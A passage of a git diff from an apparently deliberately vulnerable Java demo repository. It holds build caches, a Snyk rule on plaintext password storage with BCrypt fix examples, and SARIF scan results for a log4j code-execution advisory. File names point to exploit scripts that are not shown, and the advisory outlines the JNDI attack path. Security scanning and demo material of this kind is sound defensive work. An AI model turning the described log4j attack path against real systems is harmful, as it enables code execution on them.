1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a1803b64955b233d41e26a0d5b38b8029c794ed5f0463"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cfeef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d3b77e0a4"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1707749068024.6938,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"]} \ No newline at end of file diff --git a/.gradle/8.11.1/checksums/checksums.lock b/.gradle/8.11.1/checksums/checksums.lock new file mode 100644 index 0000000000000000000000000000000000000000..23797ae90f3508dc2e271d1bda488eb265d77622 GIT binary patch literal 17 TcmZQxerCs($*p~{3{U_7KS%`T literal 0 HcmV?d00001 diff --git a/.gradle/8.11.1/fileChanges/last-build.bin b/.gradle/8.11.1/fileChanges/last-build.bin new file mode 100644 index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 IcmZPo000310RR91 literal 0 HcmV?d00001 diff --git a/.gradle/8.11.1/fileHashes/fileHashes.lock b/.gradle/8.11.1/fileHashes/fileHashes.lock new file mode 100644 index 0000000000000000000000000000000000000000..17e57034245966f86458796385dfa0f9509cb1aa GIT binary patch literal 17 ScmZQ>W(?t*ml1r40SW*lQ3DkK literal 0 HcmV?d00001 diff --git a/.gradle/8.11.1/gc.properties b/.gradle/8.11.1/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.gradle/8.8/checksums/checksums.lock b/.gradle/8.8/checksums/checksums.lock new file mode 100644 index 0000000000000000000000000000000000000000..074c6c94a4cdad2098aa6cc1f792d32f796cf7c3 GIT binary patch literal 17 TcmZS15ubbP3LkeQ0~7!NDH;PX literal 0 HcmV?d00001 diff --git a/.gradle/8.8/dependencies-accessors/gc.properties b/.gradle/8.8/dependencies-accessors/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.gradle/8.8/fileChanges/last-build.bin b/.gradle/8.8/fileChanges/last-build.bin new file mode 100644 index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 IcmZPo000310RR91 literal 0 HcmV?d00001 diff --git a/.gradle/8.8/fileHashes/fileHashes.bin b/.gradle/8.8/fileHashes/fileHashes.bin new file mode 100644 index 0000000000000000000000000000000000000000..3aa9dcacf9f29688729607b7da35724157196e72 GIT binary patch literal 18547 zcmeI(F^U2)6adgD!h#42vM?a%ZX*aHf`zSug_WIn0XtdPPS3H$+F6Uer?9p43?4x< zjDuGYc^{H|lIH){CYgkg)NYRm&-i?%G6Dn$5FkK+009C72oNAZfB*pk1PBlyK;T^j z=CP4-)=bhZrb%@jLcbD|!uIF5+qYMZ?07oP?+@}d?su{?GXVkw2oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly@CpKhSVa2R|2rME<>p%d d`Z$a(i~rx#uvvi_@% literal 0 HcmV?d00001 diff --git a/.gradle/8.8/gc.properties b/.gradle/8.8/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.gradle/buildOutputCleanup/buildOutputCleanup.lock b/.gradle/buildOutputCleanup/buildOutputCleanup.lock new file mode 100644 index 0000000000000000000000000000000000000000..6b811c0daebe6dfdadeaec7b84c4bdd2727308e3 GIT binary patch literal 17 UcmZQxzE%C?_1RY+Ge7_n079|_d;kCd literal 0 HcmV?d00001 diff --git a/.gradle/buildOutputCleanup/cache.properties b/.gradle/buildOutputCleanup/cache.properties new file mode 100644 index 0000000000..c8df739866 --- /dev/null +++ b/.gradle/buildOutputCleanup/cache.properties @@ -0,0 +1,2 @@ +#Tue Mar 04 11:54:01 EST 2025 +gradle.version=8.11.1 diff --git a/.gradle/vcs-1/gc.properties b/.gradle/vcs-1/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.snyk b/.snyk new file mode 100644 index 0000000000..07c8b1416e --- /dev/null +++ b/.snyk @@ -0,0 +1,8 @@ +# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities. +version: v1.25.0 +# ignores vulnerabilities until expiry date; change duration by modifying expiry date +ignore: +patch: {} +exclude: + global: + - todolist-goof/exploits/zip-slip.py diff --git a/as.json b/as.json new file mode 100644 index 0000000000..e69de29bb2 diff --git a/boutput.json b/boutput.json new file mode 100644 index 0000000000..243e1080d7 --- /dev/null +++ b/boutput.json @@ -0,0 +1,507 @@ +{ + "id": "java/ReturnsPassword", + "name": "ReturnsPassword", + "shortDescription": { + "text": "Unprotected Storage of Credentials" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "## Details\n\nIf credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.\n\n## Best practices for prevention\n* Ensure that passwords are never stored in plain text, even for \"purely internal\" use.\n* Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.\n* Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.\n* To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.", + "text": "" + }, + "properties": { + "tags": [ + "java", + "ReturnsPassword", + "Security" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-5a57acf4efafddf23331cc9f3c8d724e1cdd01633f61aa2d4e680b9b5241ff71L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class BusinessAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Lecturer user;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": " return BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-52010d754aef2fbde5a21bb6e6002096c329060b69306e842cd24a31129752b1L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class ConsumerAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Student student;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": "\t\treturn BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/SeraphJACK/SimpleLogin/commit/ff6715f90b9a3e00f7201618ff2f4986c5ebc0f5?diff=split#diff-c79ff75898e7300d5901fce735e57a03db459d401284e7c67ec4711d5adebba4L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 4, + "lineChange": "added" + }, + { + "line": "import top.seraphjack.simplelogin.SLConfig;\n", + "lineNumber": 5, + "lineChange": "none" + }, + { + "line": "import top.seraphjack.simplelogin.SimpleLogin;\n", + "lineNumber": 6, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "import javax.annotation.concurrent.NotThreadSafe;\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": "import java.io.IOException;\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": "import java.nio.charset.StandardCharsets;\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Files;\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Path;\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "import java.nio.file.StandardOpenOption;\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "import java.util.Arrays;\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "import java.util.HashMap;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "import java.util.Map;\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "@NotThreadSafe\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "public class StorageProviderFile implements StorageProvider {\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": " private Gson gson;\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": " private Path path;\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": " private Map entries;\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": " private boolean dirty = false;\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": " StorageProviderFile(Path path) throws IOException {\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": " this.path = path;\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": " this.gson = new Gson();\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": " if (Files.exists(path)) {\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " } else {\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": " if (!Files.exists(path.getParent())) {\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": " Files.createDirectories(path.getParent());\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " Files.createFile(path);\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 38, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " @Override\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " public boolean checkPassword(String username, String password) {\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " if (entries.containsKey(username)) {\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " return entries.get(username).password.equals(password);\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " return BCrypt.checkpw(password, entries.get(username).password);\n", + "lineNumber": 44, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 2, + "cwe": [ + "CWE-256" + ] + } +} diff --git a/build/reports/problems/problems-report.html b/build/reports/problems/problems-report.html new file mode 100644 index 0000000000..d3b4649247 --- /dev/null +++ b/build/reports/problems/problems-report.html @@ -0,0 +1,663 @@ + + + + + + + + + + + + + Gradle Configuration Cache + + + +
+ +
+ Loading... +
+ + + + + + diff --git a/index.html b/index.html new file mode 100644 index 0000000000..342510837f --- /dev/null +++ b/index.html @@ -0,0 +1 @@ +HTTP Status 429 – Too Many Requests

HTTP Status 429 – Too Many Requests

Type Status Report

Message Rate limit exceeded

Description The user has sent too many requests in a given amount of time ("rate limiting").

\ No newline at end of file diff --git a/log4shell-goof/.dccache b/log4shell-goof/.dccache new file mode 100644 index 0000000000..b1b94b129a --- /dev/null +++ b/log4shell-goof/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[813,1707749068003.1423,"e3ab9c5fd3179257a8c7aabd94eaea5eaa5da23a5a61a7395e06ec0d4d29093c"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"]} \ No newline at end of file diff --git a/log4shell-goof/log4shell-client/.dccache b/log4shell-goof/log4shell-client/.dccache new file mode 100644 index 0000000000..48d2f9d00d --- /dev/null +++ b/log4shell-goof/log4shell-client/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"]} \ No newline at end of file diff --git a/log4shell-goof/log4shell-client/src/main/java/.dccache b/log4shell-goof/log4shell-client/src/main/java/.dccache new file mode 100644 index 0000000000..36e70e18a1 --- /dev/null +++ b/log4shell-goof/log4shell-client/src/main/java/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"]} \ No newline at end of file diff --git a/log4shell-goof/log4shell-client/test-vuln.json b/log4shell-goof/log4shell-client/test-vuln.json new file mode 100644 index 0000000000..ac80e180e8 --- /dev/null +++ b/log4shell-goof/log4shell-client/test-vuln.json @@ -0,0 +1,90 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.14.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.snyk:log4shell-client@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.14.1\n### Detailed paths\n* _Introduced through_: io.snyk:log4shell-client@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.14.1\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.14.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.17.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.17.1" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/log4shell-goof/log4shell-client/test-vuln.json--fail-on=high b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=high new file mode 100644 index 0000000000..26c833400e --- /dev/null +++ b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=high @@ -0,0 +1,18 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [] + } + }, + "results": [] + } + ] +} diff --git a/log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable new file mode 100644 index 0000000000..ac80e180e8 --- /dev/null +++ b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable @@ -0,0 +1,90 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.14.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.snyk:log4shell-client@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.14.1\n### Detailed paths\n* _Introduced through_: io.snyk:log4shell-client@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.14.1\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.14.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.17.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.17.1" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable new file mode 100644 index 0000000000..ac80e180e8 --- /dev/null +++ b/log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable @@ -0,0 +1,90 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + 